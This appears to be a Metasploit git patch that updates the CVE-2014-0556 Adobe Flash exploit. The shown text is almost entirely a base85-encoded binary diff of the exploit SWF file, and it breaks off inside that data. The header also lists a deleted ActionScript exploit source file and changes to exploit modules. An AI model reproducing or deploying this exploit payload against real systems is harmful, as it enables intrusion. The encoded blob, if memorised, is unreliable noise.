From 02181addc5e4cdb143d08591be9f5710dfdb435d Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Thu, 4 Jun 2015 18:23:50 -0500
Subject: [PATCH] Update CVE-2014-0556
---
 data/exploits/CVE-2014-0556/msf.swf | Bin 17720 -> 20719 bytes
 .../source/exploits/CVE-2014-0556/Main.as | 185 ------------------
 .../adobe_flash_net_connection_confusion.rb | 2 +-
 .../adobe_flash_uncompress_zlib_uaf.rb | 2 +-
 .../adobe_flash_copy_pixels_to_byte_array.rb | 21 +-
 5 files changed, 14 insertions(+), 196 deletions(-)
 mode change 100755 => 100644 data/exploits/CVE-2014-0556/msf.swf
 delete mode 100755 external/source/exploits/CVE-2014-0556/Main.as
diff --git a/data/exploits/CVE-2014-0556/msf.swf b/data/exploits/CVE-2014-0556/msf.swf old mode 100755 new mode 100644 index f6483bd08741f6e2d275d8e95e7cce77be244500..3cf2bc3d4f3050303018392bb865b230ac076125 GIT binary patch delta 20599 zcmV(vK60-Z8$HGbfZD4&S@AO7i5~Jh$`&?6EIH1e}C8|{>E>#N%^0w+`nRHh$4*Z&&)z@y1bqQ zHBN133_C$(JMX{ad~_2uq4+~3`7e~8AZdp3rb#`SuI1Ce1 z#Ft8pxuRypTBsJ=ddSx4)LeGin&Ku}?%iOJ zD8cdNLIii%$SgWIha8O9A>r!{`cKG?vZgI)H0@%J!2tbUQGo&B$i-`x-}n(*9l=-w zSu+A^lr`f>1_N#5Hwc`g$<8=b2B1J06m^AT94u`UtBxb}_V1fzeer0Tw3jpWrAI=A z(6U*?NdrI9A}MKrtV_w8f5-0>!6%kzgi>|oC8Qkl)6{#lNZt(RDFZ%Qr12;4e=Ow~ z{GGJhlQ}2PpG!SkOaSf!JAEr596d=k)OrMZH4ghundfyfSF_Gju9GV{F>{0JiWLg} zz!Ou*#Wyp*6$E=ju2|5mTK2eR}RW+*@0J9g4p+B@zm_2M+k0biPUWx=Iw zaA_alQ03g%Wz?QA;of_@@#UODXfSBOkrau12McXA(i8yA$rs6pw5bZsDfc(43gl3rn2_&6oYES%ByS$!&k2dMYZMfY2nZ z?HFchajqdfWyExxPi9*Td#bKNFjpM{A0xox4n$O&7*GP#fBAz$B`dLC|GqHP_f2!Ht(GU$zNBPL-fCB!;Z`&fDC+%8LG1~gJ)9p}+MCFq!B_D@rg$$MsB-hfhRVEs2G^FQ1%J8v`dai(ZMHXRquwTBo}!az1W@Gi&OnM3mi$ zSDXyQmWxXB=6b2Bq4>|*F2_NAHHhd^=t)&4E$Sh?f6dWBP5Ph+pcCU4_s>{?b2`^f z%~~TJpVAw;?gg+I+U*daioxg78Ek%46wU#|EcnUVlq<2bMo%Km1>5O?WrwIM&_Avs z3nP_bgH1(dW)2RIY(#t4cV;yfCg1KADc%20(M%A_2(qdlYUB zz12;6f9nX>Xhsmvd5Ztv+Q)AKM5?&_LDWSN!6a(oQc8wdq#o%p7kuKLXyIQ<7B_(+ zRPXOYqJb0?n~jHJE9c8xmQ176I%NEx`l~9qdeE6dF38i>2rtx*tjQF05!vpVTE)zok1z{VAAu*+gpkb+axNL zR-+OuSs0p}t$cs!RAP$S1jRTE3vbt3n(}*=AKZR7MID@r%F6~frf4st;B;yB_Vdw}Ydln-;;xMewhEiziYE(VO zFSKB`uD)sZ*AsS*b@s$|01nFQk7iCdHyuM#DM<)vEIX(y8DYkf)VB3mdj4=`kH)*H ztpxW$tq!u7*Xqg_{yK!(a2E*pa*<}zP+d}$kEzut=}T*lRoN% zhe-mWV+3awVl-FmX*ttn1OF{de^OeRWgK?<($>wf0x9VrNwj9- z$OylzO2cxbtsmfuvgjQdl_21QRt+&6>D(w}DBw;xIr`baV&}5z@e< zVIflsHCW(^UyN7`?4GlWFdquhyyz>Q8db;+Nu6o#!Jq&SP=Ordiut0ne=XULW!w1+ z@yf-AcF`)Bf4C(Sb-?+npGc?E(J;*}$-EMnlU7>}83{R^c)di!7q$AnzW;#}J)V7+ zS)%S8Zxt5J%B%8rHowFr@cPtwMwSPgFDmXNho``X ziWjVcwAvL<4*G;iVnAZ=e-M^d4pq_)1Cu)1fvUUBS;Iej_u!Lq_=hrIM;tTJQ(VC> z^YVJN1c&B8K;BS1>CqT(!SfsfP8a?bqn>I?pM~hgXlgXN%1*s&=}rvh+gTO1UY?Uo 
zK5fgh7);s57hD67r}YJVUuXe%S&$5lmJW*A0_fw2R(@R(^&ujae+eV@fB_1BXCSWp zOFOBHDVekq-f*2xYZm;7Hp}eL22p!l^7jH7glLx#&Q7M$KvM~<#Rv5eEQu_E2A+?c*qtsI0($-3TtnIISI8K9nmX3A&jQA>XZe^bZ3SocCID{KEiT)!B$raZb(4KFD~XcQRI1P&QA=4l$^2d9F*zM_7uSb4UoRrhll6{$d3+3>DxAbul@ zgAta!-vkuMN8Y9B-<%Ls^Qn5IVx5KG|JAM98+vtF%6U&8mZ1Fgw7KW5+*bBa;ilY1 zF}6#tY|4Ele|J-LhqRit#0Zrr-*yW;w(FJpZ{}4V^P`jB%_66rCcquJ}UHzP)nW{qg*=(2@qcJVy-gj9WR z{1W?iZdjlczWzqn1iPdk8FB%MHCR}M zU=$WIwxcc@qjk=JYI;Xy22te_V^~un_`E>;sFAYKO8*gN?Xu?EXnH$#WT%U>2zl)L zJ0)JBMnLJ`1jT#IYI<2V$FN9jLQ3<+@Rsp6f2;Gm5JS6y0Y7ACv~jy2A?~*w}L zJtw^rIduzHaMooU#XPCxFC)4wwk0yhMPB9$~kul4rn6o5=wG2i{&3|drfstEd!fRM=|jkHAItE zfAOm*|IfQ(Rm-?P4vBVVdF=*aD$EP^kKxyW$3zw>JS5XN0lL8Dt|7f1>h9wT`QZQ#c!<6i)A{cBN{CQT#mO$+i-6 z1T-5$4vCz;-3ncaQTtTXEUlD1y*063@i+lrT1idJ{;9yF04Vx}NaZf-q=BD7daUq@ zN$?oF&nbe~}?6YbP1+O@PfQ&*35>hx|xoWCU5}*e%YiJWjAZ zuqKV+_;5RcRm&qe3L-hY%uOJw6)G#4`n(D?d}oTjK!$k=9&u3v1RfHc*Pw#eu!Y0! zuVh>_WzaSy3)fKdCse6o%Js)=9#EVJvgtDN3FYM`T?SNFs)RYP3G12Nf95F@F?1%D zTnZSYc;Lr4ol+$MK^tOQsLfVcjO3K$4EJbWw+Ka9n;rUdoFd9>N;)W>AJc5{jNr}9 zJ?}TMCxKP$fe*DZK>VsvtG3ir19slP&~UbM#SiT)IwEjXm%Wgbe zoe*HM+N^`|VEGoe5P<0ye!23b8~!+m+j5hp6~1yl;y59?dMzdcjzH#e*CxTP)!IxS5S=KLtl2e` zDEYbUELboJrO|MEJlxr<-q&8kn!2Urfs~T`0dW1nf4Q^t|2&W)C9X7>p14WuFZu*N z7)i*&uVoUNnhgp$R}#2sqvoEKCx)ch3T_sKjtRYbyzUl_S=nmpA-}iXUC%X`8m&ao zMem)5BV<5R*&;J}ghu^pq&c%*u``L0XC&vP%cxjJm#dsl@&F(HSHQ-1dZUN!D)Uq689X4%x=HJNEqa zy7h|9Z{Oh6+oG;T8O26elrgzEK5Y6>*9hD%OZo(`TQ9kb`Z3*Ue*ci#xNxe;73bEv6TVMknvjRP{_Jubyiq5jV~8 zJhJ2)bbh%1xV?t;Tx-AN>Gs=Xa{!Zw8Prk8H4%LkZkdv5= zesjwk240+?EOJ@s5?uSkxxY{)rHCoJtgk>S=8k_nfJ?cD{V5{N9AKLrrsHiwLJ%jQ~;j*qPC z1q`re(DCkhX#VWAjHj3h6I`-1;zux0hilI3l1-YwkfL?zH9kZf98rt2s~hQHLX@;Z%56X{4Qoe@?n?g&+mrp;Oqa`BpA(t z(*I5BDu#I<_(jYKnS%yUsza=DeZ3BK3H^#rI962L?Ll?40~wlI0Bz#(~T){wR+6V|_r41vQp)m|rEe~p3*CX8ORLrQbo zO`_|TKN9Gf48tHmkwF~=s%Wc|0(#f_YQ&jw^P312WI1Nt`;=$=c?}gQH=K_lE&60_ zsKAC*Izn5DYU|hx`89cl(EInf3NB8<;`E!yZQ#;qWh|!|a|r z?G@Fo6@}qhtm~Am575Kc 
z@J9PmRHD(E3;$hY060M|YtMh3d0Jx`M?)Ke*c7Bmb8s-R@pGq9!=U1wLmr^?d$7)^_s7)0v0g zwO2NH^1fPnGspdjUS!n*6(W=RVxqXgW7Df}PiAOn6tX6rVh`hpZ?IT>_lxyBp!JoM zo;5(?M!`dEe~IwCs9ALdE|+TbY*Y7G@pl$tnHE(zL!d=G{7qvH#!|xGUKXEi$7Q1H z)@t;7BC)8h)D_E6S@<_ZAQ-sCcz8^QnL^{S)%l>hMaNhuhfmnM=Ab2N6mICzy$-Ck zq7MC0Ct}kVbwK1M-k8!_tEsbw)DCeW<&gQv59)~Yf0Dk7qmFI_ZWo8FZ8Y*%DUXA`bvektPhh{`>j<3oDKOu013pln1AdArbRaPN&t z;=%=;1&q2(Uknz0aEs&T>5SS%aS+$}1NDVub1v_1;%xk06wAE@7v4Sd2l2*)j@(?V zZ4N(U?HuWlDs8A4SKwQ88A-E!^8J9yGn+9`e~TdP3>eEX(f8@$p0|(Ulm}7W98j?^ z$c&T_Y)h5$i4&n>8z=Kp?>Mg0{GvS>R`4(NH0Dz)gI%z>d#(|A%4BIQh8MP{N#W!OLt4!>lH1zGuRHkDEVLoc4N7!{qF=t(OU-e|+E}hWV65`l5bG|MY3N)x+>IrdR8#LoK`O z*|=K7Ml#B#paGpOV zn^M@q4h8FgMpv$CkvI-$n~&@+g3UIj*mX9y+3ME30yIDLdKcSoR|wB`JMO)!e=F9& zNAA44yo&8==FQg!TUqkN>V8Fs7~D!3Mww7TFk7X36-wH?W7QM7u!T6ISYUUQmUaxX zBX?GDS-|707xeN+kgF$Hv~Ax>JQb8k^&#jbr!(114De6Gi+GZ$Li6I9tZKJ#d3|6He`JLT_aIFD%>_}g@|`rL(XWg8Eobp(*GraQ!P$bI zf?WZDu9~d3cJ=zdC|<0T!r z2y)8K%c86iTIDnS0`vN4oraQ6xxALQW;uw{xE|iILeVFL?zB6TjbY1917pmbC!bfe z#@cp)Peh0G!2T9o;l`k5g6gXdohC+e&B8sMQq_ofg?s%NLOkc|yGAfujp%13i?jPO zZu({)jw^5WM@Hj17W7*me^sS-lgN0Iwt!_rk{Mk_IDwN1GR8J2eunvZ^>f1?N3IA2 zl=@U&=$f*+(Bu+0v!iZqC`CH1uWDtreF2xlEUcfKoFL=Q&EpffXo7J>^KsYPmEdui zcD}O?bww2Rgj)Ko4K)Pq5>>~e$X%?h@;EBos+sdtmQ!^pVoES2e_H%86MvFmK+rAp zZ!~qfJ~zUc>(4bPzQ6mSZ()P}eXR6CwM=7o1#w=<^hXxEeqT{+>MjFC)9ug*$3iEquZ^qP}Ytj@e6 zJKsa*xum56g}kLNe{@oL#rg>!vgdcuKFabE)~3o8$h9RVV=9M{3LkZ!3B-X^p3MlQ zJ)|mMRLh2tQj`F@YVZ`^eD^kGz&FfSfU%!A4O2GE2;Lj*Pk@g}?(Qb(rxYiaQ&GU; zVU`p@L5nTItTqNV;Xmx(fz9vx3cH-^%h`$`^`N4ZiXTn+f7vgw*Q4Q~*qG5l1ujQr zB928Ypv=jB@B4=+__=L=bxjE!8?|xWXdB(t@t;T&r^3zW@pTDe! 
z7Wjo9HB2iQAR=Sy^$Y5E_KNLzDf7QM|bPaPm z+pb&^N^RoGf6jx=L?U|(LqH5|!KL!k--5hk8@~L}8&7XGMr7mmYC|2PTlaM^3{J9r z$7t97G=b2{>m1PHG=ipB%BQ9|ni^7Svps6y-V7=snN8AWs}$(QyPA=huafW@;kw%6 zNjLG!f3`8%U*gn#0cbP{qz@-fVH3Um>+~5CVtle^e<^z~>?vuyK9sxf#fOgV<3@*X zLdjv_YAoMwx>X!RCYse)d#iONf}Kx3&cbpTtH{8midY&0(SrlP5xV3oT%#RK7Z0fC zkCm&H9;D;=x&TM&UsP3#mZaPkAJ@l!xL%$rX5Pocf0Y1*J#I*jI^_!7+&m=Eq4FJ6o-}5( zyipk|rhazXwM7ka1X7h1D&k_N3_-~w4btka07?ZT*{hja{<5DIfN!D(5%WXmNViQmDig!-Uveq8SRpsRZ`J=|M&=Pf=7oFwB;8BtclC!Yi#lz|pzDDF zQ~TzN77c2gZNDJlVJf-2*bpGB5j`7X`3xJDMED>rC6T{%Vym6>8#FxROs)X=fA>6^ z9(Elwm|fd0uA*k!6XFz7rjF;%LILE~c1Bm31uvtu|9(Zx(j%1Fw)*uo`>|ZUf=rmU z3exT~(=Ku3hLU`9XECDU^b)1anzT7m}IP<6k0Cy3^0wCU{Ku#LS-iQz!9>erFd}%7fNg*;!Yq3C9`SZ%T zF@<8SOj~os1d;z2hUbl+9$?S~%-Oo#LSh>u%IPDw2)B#B*Msf@@^C{2e{^om!pIM3 zRDaw{g6@=L2X{HTqqEt}n{~87dKwLM$UL35(cX+Z3D=V5Yz}_ab1M7n&P>u7FA&m* z?#^;V#!4`8;xLET=LvPo*m)m8+hW9gHAFJGTEGh20nQ36r3tlY8%cq~vP!DnCe{yV z_q0^tf>cAR>w**#$qgY(e>VKhn!jLOu&40G*#m5W&oabR;A;wvLDSKZTz{#WnRGgu z1tn&N8dcZ}e>q7=S@&`pyBzH8I*A3~$s<^YIX}qSidpmMmPqMhb60e1Chxr`fnZf7 z;lGV%NEt*leWlZ=nNT{YQ4bJVZLR&6rWgU+ii$-6FUhWWtRgxTe=WmEhZsn3Z#3*> zGqLL6EWbRXjQ`9KPm52#YTDrc6}XaI#+YQ>z=}=m`#D6@dJwpSdBe*Bpi);pFVoM~ zRN~UCg5cexbaSPDeST(gn#+O(a2)l9SzE82dD=&NE!sk&^mUD9f1ur7M-VC2@0`M0 z2?w?2L#(($g{rx2f8?qA*peDaJp)4z@5y5K%H-~8>+*Z+q1DG%X0SwKQd9r<9OHq( z>ze&He}d(7^!%AUxLY8_zw!JW*9N37{#vT#LF>}+c(tG}L`AGKsvhy(WFYEVyy#{@;S1~U zH+-Qv+i5NW7m8&$I+fU5>PZT+U0U|% zRqb!WxSlM9 zz4OcMk>n1*sY%&8*oEtPO{Hk&V61fzCm_7$vR6!`e|fMiP^pav^q?49=HG3Z%T>uw z0W~z{Of16i8ls{p@kgC`gGcC5#$Df6Ro*;N!kA|%=KI4V#fKKAwIR)7MQU}2R<>Et z(#>-Oxu)Llw#qQ|??0%cKE&Y*k+8iZ?4ay~$g;{o;ZO-mnlQvGr`a3(w6YK>&di&d zj0&N`f2CSodLEP<88G~jlb0JZZs13)*Z5kb95RU!KdQRV(P{#oaUc8e1yF6kj8f|W zp*a3n-gMSGsZ>xov^&Rd8-ZkDJ{apGH<7 z7bldNQ?`l(c_gZ0^^Q9MrmHYxdktAGQ#s_}8}*PwXxZ%cN_g?zra7A`ZPN{U@*0rb ze<9WpNMW{$KC!M5uTR)iCW8T|=*IIP&(>@%1gh8_(hent^{-|TlreyPe{L@@nzx8n zMRt?3r%!3r1E3NLz?+_7qV{S7&>fJvlM>^% zB3A_q1$tN?O3gUVG~iW7&XC**^IrT*usj5CbMne;$J^U)qJeE!IokEmJ~O+6mY%yR 
zBV7Q#y5J->YRm{_3{9N0rBgX2Xft7oC)`h~#%xSEUV{7>8Vo?Z!&g4^&;mqcOa`;;WzD3(@bqcSPe>rTzlaOe2 znFTp>?fwHI{rxvzovj7odxZYR2MklxcBBN||RRPmJ%u^geIwMn?bAm_(n+v8UO+C3kh5Z4sT} z)@X#Gd=g+z^vn9T3|fL{e`xR+6KQ{5Z%lDjJpu|WU|D-zP8ttiED;d@!-v76?R5HH z22)t1zWsl}-KbmeW9IzeS1tu=8S)2$a{fg9`7|Q|R4HcU8`L||!rAE{5I_EZ$nkVL zjR)WW+IJ9-nO-D#*W`g8zK#{hpC>;(DhU?&ar!PhICQaR>WjL#f7rn5$ta3k+GJCC z_=gGI&R#udYMGQX#P>HtqrBlbABGIuG7dqBiTlyToB5|d9W*}o@Xa1IT{70+G|+)W zP>$TIhGXjyCHpd<^>8E=^exQi>*gsf{Ph}X6bP-$>2Fvf21;GVchQR!sGx(YlpQN# zgXLKL1n2a-CpLHuf78Hk9!D#bF0`ObsM~NPNfve#{g(Ri8UfKsNg47@7uaoeI;~Ku z(>@6bW?GaO98mAA+-mWWOdEi%1GPjz9!tWxI*CnOSo(qGoWodNY;`+id){|A1<$`e zwmD1-z0p9C7v=QaAwWN~+fJ}ro5SQjFQu6*@Et+f7Dn&qe;5PEezTYDl^BEP4f4&h z#w@RUlQ|QK_%(6}k@nQxHE#0+X*0lsZ6U_z<#Um*05-`p)Dq^T94g`k?sLwzam<~6 z?eCMg0;}ALmYc2_~iU8lR@iyqAT;~ zxTG9q6;;BTf1lUQ={!@-N5eJ}H+*wd&BXAbaS!3$1J(;~D2=yM@cIl(FLX3YAn9-L z2|(flFl)Boh^WM2EXhij6!Kiff%QbnoI`Bn1gj?c_aK$<7ASrN1(G7>%FCM1;`%Xp6vZzurl;uq{bO%T=UYx`NMb7fT2AXBzq& z+uX5tf6%H=49Z6o0ve|hJ1>N*}{b?ZC$7L-GlY^W=o`0@UU zR5GYe+||$D!AQMd+ZUfSNb}eMQ)l7vBIgkYUfvh)I?(RD!wJWb+NWXkFue449^07f zjw{}Z$=rm2^+GE_sg_;hWSrn1Tt&LA6sO zQ#{1!+W=YS#YI1|%jNU_Wt{i3bOgTnqZx^^7Wv)?00FlQ=m)sHgnZ3}|Xe;f+Dfv?g+xsZq(!#9mFvELgBXb0S*(eyx{ zy%7-_pGEMWvXun9z`bul#oJ1mt*BsHF(YyLkPsC_sncT|;*r3&g?8vOxHG z_Ex#5$PpqeMz0T|>7HX@Y^!y#xKN>PDbkE~jJXz2JrdeQ#I%M6 zJX+stQkLjf`cUkUv|5%GYOYNGEtw;vlAeL`6U)P?MgsH`K;88duh3tCmDmukVN1{j zy$uO2;JW3w@VLRtC#Doq4W@-(sS6`C0 zFw$5oA1$=Z%xa2A^dG&^U;yV$wdQT=w=xq{{W})}FUr5iviFO{IAb9{Q!I6)5rfd?G_r0PWNq$v75ilGNsT&Y zdZH7gf9a5RT&Q@5YKa2ktBj9Ux$=7{Bp@WN~6J?kWs@7SY9t0!`=U#T9) z>I&yxAd0_dYgT^f(y49$h17vz@Tt$nUP53m>?^)Sxgnr%dwa{`e>~1__^wswoUrZH zp1|>qT(>3Zg4|#P@{e}>>acRQ@$C<@ z>9*O(8+FBM;Em2!?;An$2P+A3lfLgP#FkQ;@>4CjS4?AnSI-yZ)b{s;7BFiOrdzHi z|F4@)*u>g&ISZD?e`j248S;1KF(LN=enJ_z(sW4n7R=R5^S~Wn66Khea47XrW7gQKQ2?Sz$J!&X50mtmr}d!eeh> zZ~5Fb4Vs1(e??`48SZh96@xg|MIHICqRjx&cBXM%9aH71oy4t~K6@QA0Pg#G6it05 z8#DMaqreXVFnV&69C}hVbXoV}g@fMa1x7xXSoS^Kt#&eK{|_agYFT2~%Gq<33e&dv 
zz$n%u6CT@#H*hs~y$B<|lEA5_Ttm~i=hwbva(d1?f2c~biZDXmy>fu0Atx(9vwb%x zf;q|i9auO_fN+VqRm4E7OFzE!-sdwqCLIah=x>joWXnFtxNq88=9TO{=bC*RI^0SG z<&gkpmtLyl8Z)RX-=AFEOiY-?8>Le9MLA4R1o1!Gz(B|yq$7UE4EXx12+04+mJ`|D z(5czxe-UOA8fWQm;=|O>)&Zgt{5a>>fAdU0-KpTQ46_`PHtJ;ZHV?}zY&YGam}#I8 z4^Okz-)h5*V(ae2%CaHk{KnoV%1Ja1-U~vS)GEaF@bWhqAe1o-^xfkWD$s?t4M6Uq zi7OSHOhiuUr;oG}Vth{JSF$p}-Dcy7%MDp^f0=LM#;8RM$}mFH!^J9c{B7&!@aGG_ z_LaqwTIDGsLthqN0(}|A}9hH0c<4ur~+QP#9Hf% z0El?yt3Q6k!W31y1={z=Hzz0EI-qtdJH20lLlYs|$~Um{@&fW-wrNz4$bU$RNDhtW zf0XF9p42fmDL z^AtX!Mo3fSakxDOXy38%UMLc%;?!^O2cGm5yMwY*y<8>mS@#Q4Jl4XT4jnKDMayKP z0-e@Is<)7V$#Na+pBqc%oP_(1Yziv*f1iGVy4}3@bU(2mLZ_A?aK1HBS~a}#@Ev4$ z`iEH7Ck?RO4bYF=FP$OfSBektIOW)y*ezI!AMomQCttgi+tI?Ar-0%cWV^qY#0XOY znaCBGe|^y`9e0QVh|80aKjpF&*3Bvro~t3=`;D3{!3I((riI^+fYbm7vjyG_e`^?6 z2ec9WIH=#X6m%Q3Elan5L+=Vmq={b%6qy~Bq#PR`XGh8&pXd_Q4vi^oLCOUJ*;Q3z z?`k5Tj`*`3x2YehH!?41GX)`FFlc5}&FSpqpD73Upfe_OaUAEW!*=mmH$;4?8y5t3 z9};i;e2dA~Xt9$3=psn&zw+sgf5)Zi_N3UAH(IY`_Z9D{<-_Vna^>|z|6{BD0=Fk$ z$E+e~xaGZ7bp4&M5jV5Rp6MGC^S1a8oMC_%J?2vVqJ*NI)IkU5JDOc5Ee9E8E5gP} z=AR^S>uBMrqYuddBR4W%7%J5({VHKJZYP39IWrw7Vu34Ya4tXWn*U~ne_1PpAMs=h zzDqhjvX+{iXmaO3dglGP(L#Ci!&lXxMXD$ttcauF0Yigp?bFBA*EJN0PI{AUOVcV% z1>>O~=w>B^7&&>SvVBgN(T7<~%OZI0I9JTj4}F?m91esw3kM?vLt_ggfYg2t_nAdw45;bWVyD|x#X4?~*&SaeGB#^c1--&w#lds- zV^v>H_&<%goEc;ce*t5zQTP-llgXpRF!81_lJy1A0DM|g_}nFbLKN&DS$or=$U1qx z7gBG*Q?8{kBB1l4XEr5jJcI~K&g{*viJr8T%aRB4-e<&(D_IwH1LhzbN<=Km+P0#) zoOWvefW-Ki>lMt(RorVhSUBC*I@T4SOliwn&+$Oc&9A;3eFw3(We{Q6vT*Ob&(~w zOBR@9Is#v-f34^qST9=V-BrZ$%+JT7m8{PCW zsq2RE$kjmFpfM$v>|oAdbFAy|#~l+Pl5aWlbsD91Mp8a_<=(vz{QI z|3!;?YS~W}v(IV@1!txh! 
z0t*0|zz7RXZ^eBAt2`rxPx*(+^Y?0s*o@TQ8>>G`cEY+C4J_o7s#Olq82$;B%OepxPHogH=U ze$03;+kMduvt)MDNs;6Gl8Fx&gyAP=OS~(|yI~>>Gq#>4;S~%i;(4_aHMlzF8c*0a ztx3&g<{A%b=AIm&osqlvOUX$*Umwkaq|ouuf3UfLdj#JyF&)plmu{MAKKqOC+$BDg zn_I~#R0GgudrV);sshx@_n{r28}0~e`N9r-CiOb1j(HsB+xjpnu3QpTaGj|N;gjwTxO!)5tgX`?3=zt+gxUY$ZGvw!7iw4NzCi=B6p$eHjY)BQw!M8(y;GYqt)4FGP|$gY_vBp3^f7; zaONl2V6X8)-a*Ivj}{Gej4E_>Qtj?fUuQ`CKv4Ryj$;~y@oxU6ka(HIX90W>pu&E2 zH7Go}{Yqw1LmQiI+9@JTou#*c0Hue#e}QiyDU56GPC?JjU;4}~nna+U zh%Jqx12iwVbcw&b` zT3W1_tTHXqTab%kH}Qeue_0h#j@CuLFHpLYpF1?QB-NZ`Dz?)H%clm0uzmeOe_?yy zqaUfR%!vNYd^Sfr|7NOxbxHtud^Z6}ar3xN@PJlC{VsuLRs^V=B3fBD;Yv)WIimNr|yMch)ZILPo+o+jxOUjO<cg_!oN5B=?!PwJ$;;#%$PK+_y;mspTAd&yAKY zWIib#e9t*kkcQWN%G&L971zKJgN8<)-sRM8@wwukXiyh-2xiMMvdRMBCJp^PCBy9~ z6-xU@R8CbL807>>54`o$IyrG@!x~gVde5HRde|$sCJ`EJUl;U@qbcdWE5D9>6j`*9 z;iBp(MdpxN@+P^eB+5k6f16z!X!vsERC$V9AWr8H+}LIpy6^5v$BVkjPcQsNGhZ%P z$4w;n@1s&+!k$O&=>B{^U2{78AGO_%u0_o7$@;x~l1@leTy;mg&sm5=qJaU))r*(V zcO{MI(eBI#VdBq`2N;h!F4yBgZwq!8hVRAkh9MsUOAeHW6@yD7fBkzGsVlj~pcs;3 zBg#R89Of$K6N%mr+sXZv5+WNXF^iaC-s!H{=~Q-P%3k2N?(~nkv9=69TxI{fbPnyz zSi;ak32P}iw$Ph$`LLK~8teQMS-knjxd1E1F~l=3z!?k)f1@K(buLff=Wlj1AO(-J z?<%i3TCeZ1GNy4yfA<^F^%=tEurTs*b+_r;uqAObk{bQT44OGa5yE=k765=~e9E*E zL*GCJM3!o5&~oXXb>!qiu5mwmMr-%C#Di-&>5!MY>qmzl(01r2(C~=q$(HtQK|X|p(G@Vc&Di3d+*Z|qeRLc+fLsrLO3c~0Ivr@W=cTTl2;)#W@J9@E&E%(61STMdu}Z~-r?98O4$B#zc%7qDvd`&orMQG8%! z(ez@eEqkTZmPBb;?~4i;yf4`JUPmLF3jWG@;Cj#XC(y;?wvIW_9qF&oB!(i*Xszn4 zBgvlLsp=Wl1%G(+6c+fImfASrwfQ*NWfeEI9B|;?0$NDfnL42aF&ce7+6jA1If%R? 
zfMXWzW^aO48#NUwS{yA0mEpWQPvjLkN<#o+t7Y~*Kj(mqLN_7qF##&=qjYL6ww(~U zwzGx|dOrtIGx$_~2ZVLwD|xasD5pGUt^$(U=en;fp1UHf8Zt>z0P+DM&?vH~NDBE2Dx2Y!Ycn{1Uxj>iH_s zl@~g;n}65JfIH6g0k^W{TmS|fKVgHebo=D#hjniwjn!4r`+*pjO^!y0_&&EPakFe2 z8=ELagsJ?>g#q1Y7lz@W7>BUD$kx3~>R*`;S5!j7Dn~8jCFkVlIp_jn|&6Oxc*Rf+% zqvbMPj3IPoQ1l~%`o-ZImfRKouHk%CwkKhl#*#EjPW^%cX~p&6Ueig;CdAkRpmEMV z$bSp(q2UPhSyRotn6LB|?@b$bD+;61f zgZSnHbSR~b#&a>_EroNhVQNcp9moua;2(u0rPm_gK8kd4fnQ1gYr3#L18U~|qs8(2z5mK&v%8Sds^^y6eVeJFTYN%(*(Ip`H-6(W7=mcFn+sNJ^?0=Y$5z0Ep zL=lGUiEOD3lwMSERc^$TL|G_%Aimm+2mYYp#o5O0sHx1Ly#d%FSMi2muxU3e;p<01D!lPb*i%f7t zXZfGyJ9Ix%lN#+bMZaYj0e_!xfEiQ9^v$J{a+HzMLHkRx>E{lGpMFptiA{eO7vcd3 zud4&NMoGR}7N!%$9Wx{ygIvU5)XU~^)CJl|Rxgjo{3UbBkq?7BwKwYosjjzZ+3u7F za%KmEI2y%!jzN8tl|zRVIxOj31?xfaf;*x8{L$~fq~8$n7EiMtX!HLo3 zN><`Khf1A>)ChNZnv{giR9Ew^5;g;jQ(4{9nN^s*v&nQH{-f4Ys!F`guM$Cm$s1onQ?j8i zZAl!MQ*>JieRE zj+p;u0>ifk>MPx8NjtCm#U!BY4(uoh!s!$!#?K@DgrE{$ha>WMKoQTxi8x4hajY;8 z10Ll~v?rbE|9FY&eFF{2Q(D56z^*&`j)G-H1*Kpd@xi((!&VPPfS&U!$BpjXj4gE@&wF>LJ zdduExFK^^Oξt1)Xs3-wFrx1O!PWFM`GB+qtW&Wp<-lBSn-GH+%kWQ z;tw6In12DfFJ;sCE~`E%{7PUDfEwk&WsMtp5f|?*%1X^J6=%xgob&Zp0(7l4t9@J2 zT$U-tFK~n2!Zi8SOA*sf#N;PeI7iMWi3d-W9JMYWb)d{qpt~RMzUai~`}-@7(c{Hy z;&EFY;0Tx+yY?dxy!~BNk!g1*YaVQJP--i`aepJ7MusA|9)n}xEee>6)Gt%$Kyo7K zk9z#L?!M_LuzVu>OBiGG)zDW` zQkcp2C$T{s`oPB6GNE{(&a6a@h3l!S!#rx8QKjyPdKBidKI^wZk|5I{4x)dCofDva z4}ZF9>~vBZNS}Cce!zg-VIyR|@m&>hxJ>27$ojB~2HLgUD%=m#GWa`$N9hdvKh^=P zEe}OU87g1}3=~R+;V+xYCBE}KN)?o|4daM0nF9CVT^kHLwYL7?GlxBGDRNTeQQg2N zTpU7@khUH^eBR^)ij4hi^?WB2RkU_Rjend4X_JqA#n$3%wvN?c$aboI(n&s@?o^a7 z8xfx(DN*`UEP^ADn`pDS0S+-9%MEH02wCk-gIVsk{wG$kPbrj!8Nxd}DF9ix@rH~h znS2ix+4@sfgb0Dihgg$-l^c2>b(uR|)M+^wV3n9ZbXpbkio#XA{hiCv>cf1y?78!iHf1<`$wrs z9{U?4&403`=*i{1d>Hc>kV*yRC#{y83r{1S3-XMqfe1BxL%|-(8P8q~!Ch0l8;}>| z9^*C^j@Fo6iuzpE5G^fiolI^Afqz0j|NeK|nUhT8H1xx)ayj|msvXrsg4x*=AK{X3+k z$j~od(C`IXmy4iY<~x|!g)HXy-5|DXQ#~hcmj@xSL(gMM@C0+~H0|PS&~z$m=kku$ zKReO%YeB!wya-0e1Cc8qJ)78lf{e7KLR2?)}03M@54@K0m#-oLjJIXg_23U 
zsPYt6gwF7k!Pu&F_IRI)cb{BIMH-PrX0O2M+`?K*7+V&xPJ8*!QXzz+Cs?qtXSU57iZq z@qbA9ExmYOXxA2m%n_L3K?zt?zQIvyA_O$lD4hq1e1G21*FBd3kBJ!)TmA9RYP*4s zZE|6${gqav#2L>=ALIeT*2L$fx}m?AZ%auh9==SS z{W_9~$%3X}dcomcFcuEd$uoca&NcUyzcoAoxx9?b8%YOa8~;j5W{i5IyS{uiU{n}2 zODC3>a(@iJ_z zD8YRJEcP5jg8+ImIr4qC6)(5%9`@GCUkVqoe`Z)bW7_)wMnxU_ WNF@!ul#mtt0sdjH8u@kiSh>QMST&oY8?Wv!@zQ@ODQby`G+D$)gYeK@r=sRh=ZhmT6 z-ZU@Vf@MHv-&5tJ*XJT0EnCscxc!RUW;sLxxgw+~YgbM+7jR@1%J!ST1ynLtz(ecb^!;ST`yr=H76Ea1M??si 